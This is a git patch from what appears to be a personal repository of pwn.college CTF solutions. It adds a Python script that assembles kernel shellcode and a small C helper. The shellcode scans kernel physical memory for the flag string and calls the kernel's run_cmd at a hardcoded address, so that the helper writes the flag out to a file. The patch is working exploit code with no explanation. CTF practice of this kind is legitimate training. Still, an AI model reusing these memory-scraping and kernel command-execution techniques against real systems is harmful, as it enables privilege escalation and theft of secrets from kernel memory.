From 5537ec2174d2452450149657e20fa49c1cea0719 Mon Sep 17 00:00:00 2001
From: Jack Ren <admin@renjikai.com>
Date: Thu, 3 Oct 2024 18:54:15 +0800
Subject: [PATCH] Added Level 12.0 ~ 12.1 of KernelSecurity in PwnCollege

---
 .../KernelSecurity/Level12.0/shellcode.py     | 79 +++++++++++++++++++
 PwnCollege/KernelSecurity/Level12.0/write.c   | 17 ++++
 2 files changed, 96 insertions(+)
 create mode 100644 PwnCollege/KernelSecurity/Level12.0/shellcode.py
 create mode 100644 PwnCollege/KernelSecurity/Level12.0/write.c

diff --git a/PwnCollege/KernelSecurity/Level12.0/shellcode.py b/PwnCollege/KernelSecurity/Level12.0/shellcode.py
new file mode 100644
index 0000000..9f0aeb8
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level12.0/shellcode.py
@@ -0,0 +1,79 @@
+import sys
+sys.path.append("..")
+
+from pwn import context, shellcraft
+from common import *
+context(arch = 'amd64', os = 'linux')
+
+kernel_assembly = f"""
+.equ    page_offset_base_min, 0xffff888000000000
+.equ    page_offset_base_max, 0xffff888000000000 + 2029520 * 1024
+
+movabs  rbx, page_offset_base_min
+
+loop_start:
+mov     rdx, page_offset_base_max
+cmp     rbx, rdx
+ja      loop_end
+lea     rdi, [rip + flag_startwith_string]
+lea     rsi, [rbx + 0x40]
+call    str_startwith
+test    rax, rax
+jz      loop_next
+lea     rdi, [rbx + 0x40]
+call    send_message
+loop_next:
+add     rbx, 0x1000
+jmp     loop_start
+loop_end:
+ret
+int     3
+
+str_startwith:
+    /* const char * comparee in `rdi`, end with 0x00; const char * comparer in `rsi`  */
+    /* Clobber: rax, rdi, rsi, rcx */
+    push    rdi
+    {shellcraft.amd64.strlen('rdi', 'rcx')}
+    pop     rdi
+    cld
+    repe cmpsb
+    jz      str_startwith_stop
+    xor     rax, rax
+    ret
+str_startwith_stop:
+    mov     rax, 1
+    ret
+    int     3
+
+send_message:
+    /* const char * message in `rdi` */
+    /* Clobber: all volatile registers */
+    lea     rsi, [rip + run_cmd_buffer]
+    {shellcraft.amd64.strcpy('rsi', 'rdi')}
+    lea     rdi, [rip + run_cmd_arg]
+    movabs  rsi, 0xffffffff81089b30             /* run_cmd */
+    call    rsi
+    ret
+    int     3
+
+flag_startwith_string:
+    .ascii  "pwn.college"
+    .byte   0x7B, 0x00
+run_cmd_arg:
+    .ascii  "/home/hacker/KernelSecurity/Level12.0/write "
+run_cmd_buffer:
+    .byte   0x00
+""".strip()
+
+kernel_machine_code = dump_machine_code(kernel_assembly)
+
+user_assembly = f"""
+{shellcraft.amd64.pushstr(kernel_machine_code, append_null=False)}
+{shellcraft.amd64.linux.write(3, "rsp", len(kernel_machine_code))}
+""".strip()
+
+user_machine_code = dump_machine_code(user_assembly)
+
+with open('shellcode.bin', 'wb') as f:
+    f.write(user_machine_code)
+    f.write(b'\xcc' * (0x1000 - len(user_machine_code)))
\ No newline at end of file
diff --git a/PwnCollege/KernelSecurity/Level12.0/write.c b/PwnCollege/KernelSecurity/Level12.0/write.c
new file mode 100644
index 0000000..49289e4
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level12.0/write.c
@@ -0,0 +1,17 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+int main(int argc, char* argv[]) {
+    int fd = open("/home/hacker/KernelSecurity/Level12.0/output.txt", O_WRONLY | O_APPEND | O_CREAT, 0644);
+    for (int i = 1; i < argc; i++) {
+      write(fd, argv[i], strlen(argv[i]));
+      write(fd, "\n", 1);
+    }
+    close(fd);
+    return 0;
+}
\ No newline at end of file